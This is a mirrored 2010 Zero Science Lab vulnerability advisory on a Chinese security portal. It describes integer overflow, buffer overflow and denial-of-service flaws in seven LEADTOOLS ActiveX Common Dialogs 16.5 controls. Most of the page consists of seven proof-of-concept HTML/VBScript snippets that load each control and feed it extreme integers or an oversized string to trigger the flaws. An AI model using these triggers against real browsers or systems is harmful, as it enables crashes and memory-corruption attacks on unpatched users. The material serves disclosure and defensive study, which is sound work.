首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Leadtools ActiveX Common Dialogs 16.5 Multiple Remote Vulnerabilities
来源:vfocus.net 作者:LiquidWorm 发布时间:2010-09-02  

LEADTOOLS ActiveX Common Dialogs 16.5 Multiple Remote Vulnerabilities

Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected version: 16.5.0.2

Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.

Desc: LEADTOOLS ActiveX Common Dialogs suffers from multiple remote
vulnerabilities (IoF, BoF, DoS) as it fails to sanitize the input in
different objects included in the Common Dialogs class.

Vulnerable Objects/OCX Dialogs (Win32):

 1. ActiveX Common Dialogs (Web) --------------------> LtocxWebDlgu.dll
 2. ActiveX Common Dialogs (Effects) ----------------> LtocxEfxDlgu.dll
 3. ActiveX Common Dialogs (Image) ------------------> LtocxImgDlgu.dll
 4. ActiveX Common Dialogs (Image Effects) ----------> LtocxImgEfxDlgu.dll
 5. ActiveX Common Dialogs (Image Document)----------> LtocxImgDocDlgu.dll
 6. ActiveX Common Dialogs (Color) ------------------> LtocxClrDlgu.dll
 7. ActiveX Common Dialogs (File) -------------------> LtocxFileDlgu.dll

- RegKey Safe for Script: True
- RegKey Safe for Init: True

Tested On: Microsoft Windows XP Professional SP3 (EN)
           Windows Internet Explorer 8.0.6001.18702
           RFgen Mobile Development Studio 4.0.0.06 (Enterprise)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com

Zero Science Lab - http://www.zeroscience.mk

24.08.2010

Zero Science Lab Advisory ID: ZSL-2010-4961

Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4961.php

##############################################################
   Proof of Concept:
##############################################################

1. (Web, LtocxWebDlgu.dll / LTRDWU.DLL):
------------------------------------------------------

 <object classid='clsid:00165B53-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Program Files\RFGen40\LtocxWebDlgu.dll"
 prototype  = "Property Let Bitmap As Long"
 memberName = "Bitmap"
 progid     = "LTRASTERDLGWEBLib_U.LEADRasterDlgWeb_U"
 argCount   = 1
 arg1=-1
 target.Bitmap = arg1
 </script>


2. (Effects, LtocxEfxDlgu.dll / LTRDEU.DLL):
------------------------------------------------------

 <object classid='clsid:00165B5B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Program Files\RFGen40\LtocxEfxDlgu.dll"
 prototype  = "Property Let Bitmap As Long"
 memberName = "Bitmap"
 progid     = "LTRASTERDLGEFXLib_U.LEADRasterDlgEfx_U"
 argCount   = 1
 arg1=-1
 target.Bitmap = arg1
 </script>


3. (Image, LtocxImgDlgu.dll / LTRDMU.DLL):
------------------------------------------------------

 <object classid='clsid:00165C7B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Program Files\RFGen40\LtocxImgDlgu.dll"
 prototype  = "Property Let Bitmap As Long"
 memberName = "Bitmap"
 progid     = "LTRASTERDLGIMGLib_U.LEADRasterDlgImg_U"
 argCount   = 1
 arg1=2147483647
 target.Bitmap = arg1
 </script>


4. (Image Effects, LtocxImgEfxDlgu.dll / LTRDXU.DLL):
------------------------------------------------------

 <object classid='clsid:00165B57-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Program Files\RFGen40\LtocxImgEfxDlgu.dll"
 prototype  = "Property Let Bitmap As Long"
 memberName = "Bitmap"
 progid     = "LTRASTERDLGIMGEFXLib_U.LEADRasterDlgImgEfx_U"
 argCount   = 1
 arg1=-2147483647
 target.Bitmap = arg1
 </script>


5. (Image Document, LtocxImgDocDlgu.dll / LTRDOU.DLL):
------------------------------------------------------

 <object classid='clsid:00165B69-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Program Files\RFGen40\LtocxImgDocDlgu.dll"
 prototype  = "Property Let Bitmap As Long"
 memberName = "Bitmap"
 progid     = "LTRASTERDLGIMGDOCLib_U.LEADRasterDlgImgDoc_U"
 argCount   = 1
 arg1=2147483647
 target.Bitmap = arg1
 </script>


6. (Color, LtocxClrDlgu.dll / LTRDRU.DLL):
------------------------------------------------------

 <object classid='clsid:00165B4F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Program Files\LEAD Technologies\LEADTOOLS Active-X 16.5\Bin\CDLL\Win32\LtocxClrDlgu.dll"
 prototype  = "Property Let UserPalette ( ByVal iIndex As Integer ) As Long"
 memberName = "UserPalette"
 progid     = "LTRASTERDLGCLRLib_U.LEADRasterDlgClr_U"
 argCount   = 2
 arg1=1
 arg2=-2147483647
 target.UserPalette(arg1 ) = arg2
 </script>


7. (File, LtocxFileDlgu.dll / LTRDFU.DLL):
------------------------------------------------------

 <object classid='clsid:00165C87-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
 <script language='vbscript'>
 targetFile = "C:\Program Files\RFGen40\LtocxFileDlgu.dll"
 prototype  = "Property Let DestinationPath As String"
 memberName = "DestinationPath"
 progid     = "LTRASTERDLGFILELib_U.LEADRasterDlgFile_U"
 argCount   = 1
 arg1=String(9236, "A")
 target.DestinationPath = arg1
 </script>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·mBlogger v1.0.04 (viewpost.php
·Adobe Acrobat Reader and Flash
·MPLAB IDE .mcp .mcw DLL Hijack
·TFTPDWIN v0.4.2 Directory Trav
·Spybot-S&D blindman.exe DLL Hi
·TFTP Desktop 2.5 Directory Tra
·SnackAmp 3.1.2 Malicious SMP B
·Autodesk MapGuide Viewer Activ
·Apple QuickTime 7.6.7 _Marshal
·Cpanel PHP Restriction Bypass
·Safari for windows Invalid SGV
·QtWeb DLL hijacking (wintab32.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved